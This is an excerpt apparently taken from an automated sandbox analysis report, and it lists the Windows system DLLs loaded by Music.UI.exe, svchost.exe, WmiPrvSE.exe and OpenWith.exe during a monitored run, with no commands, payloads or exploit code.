              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: inputhost.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: resourcepolicyclient.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: d3d10warp.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: dxcore.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: rometadata.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: d2d1.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: windows.applicationmodel.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: esent.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: windows.storage.applicationdata.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: logoncli.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: mrmcorer.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: windows.staterepositoryclient.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: appxdeploymentclient.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: bcp47mrm.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: windows.ui.xaml.controls.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: execmodelproxy.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: rmclient.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: uiamanager.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: windows.ui.core.textinput.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: windows.ui.immersive.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: dataexchange.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: threadpoolwinrt.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: windows.globalization.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: windows.system.profile.retailinfo.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: windows.media.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: windows.applicationmodel.lockscreen.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: wincorlib.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: lockappbroker.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: windows.graphics.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: windows.ui.xaml.phone.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: twinapi.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: windows.networking.connectivity.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: windows.media.playback.mediaplayer.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: mfplat.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: rtworkq.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: windows.media.mediacontrol.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: mmdevapi.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: devobj.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: mfmediaengine.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: audioses.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: windows.media.devices.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: windows.media.playback.proxystub.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: comppkgsup.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: directmanipulation.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: msftedit.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: globinputhost.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: msxml6.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: windows.web.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: wpnapps.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: windows.devices.enumeration.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: devdispitemprovider.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: ddores.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: defaultdevicemanager.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: wuceffects.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: windows.networking.backgroundtransfer.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: systemeventsbrokerclient.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: profext.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: biwinrt.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: photometadatahandler.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: windows.security.authentication.web.core.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: microsoftaccountwamextension.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: mfsrcsnk.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: mfcore.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: ksuser.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: avrt.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: resourcepolicyclient.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: gnsdk_fp.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: mp3dmod.dllJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeSection loaded: msdmo.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: twinui.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: wintypes.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: dwmapi.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: pdh.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: actxprxy.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepositoryps.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.appdefaults.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.immersive.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: uiautomationcore.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: dui70.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: duser.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: dwrite.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: bcp47mrm.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: uianimation.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d11.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: dxgi.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\OpenWith.exeSection loaded: resourcepolicyclient.dll
